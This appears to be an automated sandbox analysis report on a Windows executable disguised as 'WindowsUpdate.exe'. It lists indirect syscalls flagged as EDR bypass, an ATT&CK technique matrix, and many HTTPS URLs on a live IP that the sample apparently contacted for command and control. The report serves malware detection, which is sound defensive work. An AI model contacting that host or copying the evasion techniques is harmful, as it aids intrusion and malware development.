Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700DA8B00_2_00000217700DA8B0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D09A00_2_00000217700D09A0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700C09A00_2_00000217700C09A0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D69C00_2_00000217700D69C0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B59D00_2_00000217700B59D0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D7A200_2_00000217700D7A20
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700DAA440_2_00000217700DAA44
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D76D00_2_00000217700D76D0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B4B500_2_00000217700B4B50
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D2B800_2_00000217700D2B80
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B6C500_2_00000217700B6C50
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700C7CC00_2_00000217700C7CC0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D5CF00_2_00000217700D5CF0
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D7D400_2_00000217700D7D40
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700D4E700_2_00000217700D4E70
Source: classification engineClassification label: mal64.evad.winEXE@1/0@0/1
Source: WindowsUpdate.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\WindowsUpdate.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: WindowsUpdate.exeReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: chakra.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: WindowsUpdate.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: WindowsUpdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: WindowsUpdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: WindowsUpdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: WindowsUpdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: WindowsUpdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: WindowsUpdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: WindowsUpdate.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: WindowsUpdate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\admin\Desktop\Ulfberht-main\Ulfberht-main\src\x64\Release\Ulfberht.pdb source: WindowsUpdate.exe
Source: Binary string: C:\Users\admin\Desktop\Ulfberht-main\Ulfberht-main\src\x64\Release\Ulfberht.pdb## source: WindowsUpdate.exe
Source: WindowsUpdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WindowsUpdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WindowsUpdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WindowsUpdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WindowsUpdate.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C540D1 push ebp; ret 0_3_0000021771C540D4
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C56F79 push ebx; ret 0_3_0000021771C56F7D
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C56FA4 push ebx; ret 0_3_0000021771C56FAA
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C542EF push edx; ret 0_3_0000021771C54302
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C551AD push ebx; ret 0_3_0000021771C551C7
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C513AA push ebx; ret 0_3_0000021771C513B3
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C55878 push FFFFFFC0h; ret 0_3_0000021771C55881
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C51A27 push ebx; ret 0_3_0000021771C51A35
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C58C45 push esp; ret 0_3_0000021771C58C48
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C57C41 push 00000047h; ret 0_3_0000021771C57C43
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C58C5C push ebp; ret 0_3_0000021771C58C5F
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C58C23 push ebx; ret 0_3_0000021771C58C27
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C52C2A push FFFFFFC0h; ret 0_3_0000021771C52C4A
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C51BE6 push ebx; ret 0_3_0000021771C51BB5
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C51BB1 push ebx; ret 0_3_0000021771C51BB5
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C55E7A pushfd ; ret 0_3_0000021771C55E7B
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_3_0000021771C51E16 push ebx; ret 0_3_0000021771C51E26
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700B0203 push ebx; ret 0_2_00000217700B0207
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700AFEE0 push ebx; ret 0_2_00000217700AFEEA
Source: C:\Users\user\Desktop\WindowsUpdate.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW yp
Source: WindowsUpdate.exe, 00000000.00000003.2279771257.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2579208487.0000021770003000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.0000021770003000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00007FF7300A21A8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7300A21A8
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00007FF7300A21A8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7300A21A8
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00007FF7300A2350 SetUnhandledExceptionFilter,0_2_00007FF7300A2350
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00007FF7300A1CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7300A1CB4

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\WindowsUpdate.exeNtProtectVirtualMemory: Indirect: 0x7FF7300A15CFJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeNtResumeThread: Indirect: 0x7FF7300A1409Jump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeNtQueueApcThread: Indirect: 0x7FF7300A13BAJump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeNtCreateThreadEx: Indirect: 0x7FF7300A1382Jump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeNtProtectVirtualMemory: Indirect: 0x7FF7300A1492Jump to behavior
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00007FF7300A2080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7300A2080
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 0_2_00000217700AB050 GetUserNameA,0_2_00000217700AB050

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Abuse Elevation Control Mechanism		OS Credential Dumping1
System Time Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		2
Obfuscated Files or Information		LSASS Memory1
Query Registry		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account Manager11
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Account Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Owner/User Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
WindowsUpdate.exe13%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://146.56.219.146/assets/code-3d7b701fc6eb.cssC40%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssZ-0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.css2J0%Avira URL Cloudsafe
https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jsw0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.css~J0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssvJ0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.css011b87bd06F0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssr3A0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.css6J0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssf40%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.css0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssq40%Avira URL Cloudsafe
https://146.56.219.146/56.219.146/assets/code-3d7b701fc6eb.cssC40%Avira URL Cloudsafe
https://146.56.219.146/56.219.146/assets/code-3d7b701fc6eb.css0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssrgA0%Avira URL Cloudsafe
https://146.56.219.146/g0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssr0%Avira URL Cloudsafe
https://146.56.219.146/#0%Avira URL Cloudsafe
https://146.56.219.146/0Z0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.css011b87bd060%Avira URL Cloudsafe
https://146.56.219.146/fJ0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.css3A0%Avira URL Cloudsafe
https://146.56.219.146/0%Avira URL Cloudsafe
https://146.56.219.146/p0%Avira URL Cloudsafe
https://146.56.219.146/ssets/code-3d7b701fc6eb.cssC40%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssJ40%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.css:0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssz0%Avira URL Cloudsafe
https://146.56.219.146/r0%Avira URL Cloudsafe
https://146.56.219.146/res/js/jquery-3.6.2.slim.min.js0%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssJJ0%Avira URL Cloudsafe
https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jsG0%Avira URL Cloudsafe
https://146.56.219.146/ssets/code-3d7b701fc6eb.cssq40%Avira URL Cloudsafe
https://146.56.219.146/assets/code-3d7b701fc6eb.cssgA0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://146.56.219.146/assets/code-3d7b701fc6eb.csstrue
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jstrue
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://146.56.219.146/assets/code-3d7b701fc6eb.css2JWindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssZ-WindowsUpdate.exe, 00000000.00000003.1832387451.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.css6JWindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssr3AWindowsUpdate.exe, 00000000.00000003.2651126705.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssvJWindowsUpdate.exe, 00000000.00000003.2353968181.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977631752.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977511740.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2651126705.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2797073037.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1977365661.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2204758414.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770042000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2724275158.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssf4WindowsUpdate.exe, 00000000.00000003.2579136924.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428004046.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2504988794.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssC4WindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/res/js/jquery-3.6.2.slim.min.jswWindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.css011b87bd06FWindowsUpdate.exe, 00000000.00000002.2930664436.0000021770042000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.css~JWindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssq4WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/56.219.146/assets/code-3d7b701fc6eb.cssC4WindowsUpdate.exe, 00000000.00000003.2204568149.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/56.219.146/assets/code-3d7b701fc6eb.cssWindowsUpdate.exe, 00000000.00000003.2797073037.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2353968181.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2869526732.0000021770010000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssrWindowsUpdate.exe, 00000000.00000003.1904111124.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279750275.0000021770044000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.cssrgAWindowsUpdate.exe, 00000000.00000003.2579136924.0000021770042000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/#WindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/0ZWindowsUpdate.exe, 00000000.00000003.2052502916.0000021770011000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2128561626.0000021770010000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.css011b87bd06WindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/gWindowsUpdate.exe, 00000000.00000003.2579208487.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2354065790.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000002.2930664436.000002176FF80000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2052564252.000002176FFBE000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2428143868.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2279771257.000002176FFBD000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.2505060036.000002176FFBD000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/fJWindowsUpdate.exe, 00000000.00000003.1756808785.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1756607896.000002177003F000.00000004.00000020.00020000.00000000.sdmp, WindowsUpdate.exe, 00000000.00000003.1832387451.000002177003F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://146.56.219.146/assets/code-3d7b701fc6eb.css3AWindowsUpdate.exe, 00000000.00000003.2204758414.0000021770044000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
